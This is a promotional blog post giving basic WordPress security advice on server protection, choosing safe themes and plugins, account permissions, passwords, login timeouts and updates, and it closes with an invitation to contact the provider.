When building and managing a new WordPress site, the biggest temptation is to spend your first few months perfecting the design and content. But it is also vitally important that you keep security in mind from day one. You may think that a brand new website is no temptation to hackers. However, many hackers know that their best opportunity to infiltrate a website is before the security measures are fully set up. If your website takes off with flowing online traffic or processes even one credit card purchase, a hacker’s efforts will be rewarded.
So as you build or establish your new WordPress site, let us help you take care of your primary WordPress security concerns. Join us today as we explore the basics of WordPress security. We will also discuss how to design a secure structure to keep your new site safe. And, of course, if your site isn’t so new but you’re concerned about security, this guide will be helpful to you, as well.
Table of Contents
Web Server Security: Cover your Bases
All website security, WP or otherwise, starts with your server. While the cloud is an amazing place, websites do have to exist on a physical server somewhere. That server can potentially be vulnerable to attack. Your hosting service will make sure no viruses come in through the hardware. You’ll need to cover your bases to make sure no malware, viruses, or brute-force invasions can come in through the usual internet-related routes.
The basics of web server security include a top-of-the-line and custom-configured firewall, multi-function virus scanning software, closing your ports, and basic encryption. If you don’t know how to do these things, work with a web security service or MSP (managed (IT) service provider) to help you get these things set up. Basic server security will help protect you from hacker attacks that might affect any website, whether or not it is WordPress.
Research Secure Themes
If you’ve been looking into WordPress security, you may have already heard that some themes are riskier than others. Themes, in concept, are just layouts and visual designs for a website that control how your pages look and now the website navigates. But what makes those layouts and designs are driven by code underneath, HTML, CSS, and so on. And whatever is inside that code can be used to create security loopholes that hackers can exploit if you install the theme onto your site.
Even worse, some hackers have actually crafted appealing themes with malware or back doors built right in, making it easy for sites using these themes to be hacked.
Be extremely careful when choosing your themes. Do your research to make sure the attractive and well-designed themes you choose are also secure from hacks. You want to be sure they don’t contain any malware inside.
Limit Yourself to Trustworthy Plugins
Plug-ins are actually easier to understand how they might put your site at risk. A plug-in is, essentially, any snippet of extra code that makes your website more fun, attractive, or usable. You probably have a plug-in for custom login pages, a plug-in for user accounts, a plug-in for a live chat. But any unsafe plug-in could expose you to exactly the same kind of problems as an unsafe theme. And plugins are even more likely to be booby-trapped with malware or back-doors of their own.
Choose your plugins with great caution. And if a plug-in is not verified as safe, don’t install it. No matter how tempting the new features might be.
Build the User Account Structure
Quick, before you have any users: Spend a little time thinking carefully about your user permissions and how you want those permissions distributed. The permissions you give your users can have a huge impact on how safe your website is. By default, accounts need to have basically no power on creation. This means that hackers trying to make an account to crack your website will have nothing to work with.
This, of course, will lead you to the need for an account structure. Figure out how you want account permissions to grow, and how accounts will earn greater permissions like publishing posts and editing pages. Every website uses a different system, from counting forum posts to voted reputations. Whatever you use, make sure it gives you a chance to ensure security for and from account holders.
Put Some Thought Into Passwords
No doubt, you’ve heard a lot about password security. Especially in relation to WordPress sites which have experienced a huge upswing in account hijacks in the last few years. Here’s what you really need to know about passwords: Hackers have brute-force engines that can rapidly guess passwords and enter them based on the patterns most people follow when making a password.
So the best thing you can do for your site and account holders is to change up how passwords work on your site. Long, complicated passwords are a good place to start. But, people tend to have trouble remembering them and password managers are a non-ideal stop-gap measure. Here are some other things you can do:
Change Your Log-In URL
- This makes it harder for hackers to auto-target the login page for brute force attacks
Help Users Create Unusual Passwords
- Passwords that defy normal patterns mean password-guesser programs don’t work
Use Email Logins Instead of Usernames
- Emails (including the ‘@domain.com) are more complex and unique than usernames.
Idle Timeouts & Frustration-Free Re-Authentification
Another thing to think about is account security in the long-term. Many people leave themselves logged in with a page open for days or auto-logged-in through their browsers. This opens their accounts up to security risks in the physical world. This includes people who might use or even steal their devices while the account is still logged in.
The best way to protect your account holders from this risk is to ensure that logins automatically time out with inactivity. Of course, you also don’t want to annoy your users by forcing them to re-type a difficult password over and over again. So look into secondary types of authentification like security questions, picture passwords, or spoken phrases.
Be Prepared to Update Themes and Plugins
Finally, remember that security is an ongoing process. One of the biggest risks for existing WordPress sites is allowing the themes and plugins to fall out of date. Over time, security holes are discovered and new patches are written to close them. Or hackers invent a new way to attack existing themes, and the designers build defenses that are pushed as updates.
This is why it’s important to update your themes and plugins at least once a year as a key part of maintaining your WordPress website security.
Are you planning to build a new WordPress site or have recently put one together? If you’re not sure how to enact these WordPress security basics or would like more information about how to make sure your website is safe from every vector of hacker attack, contact us today!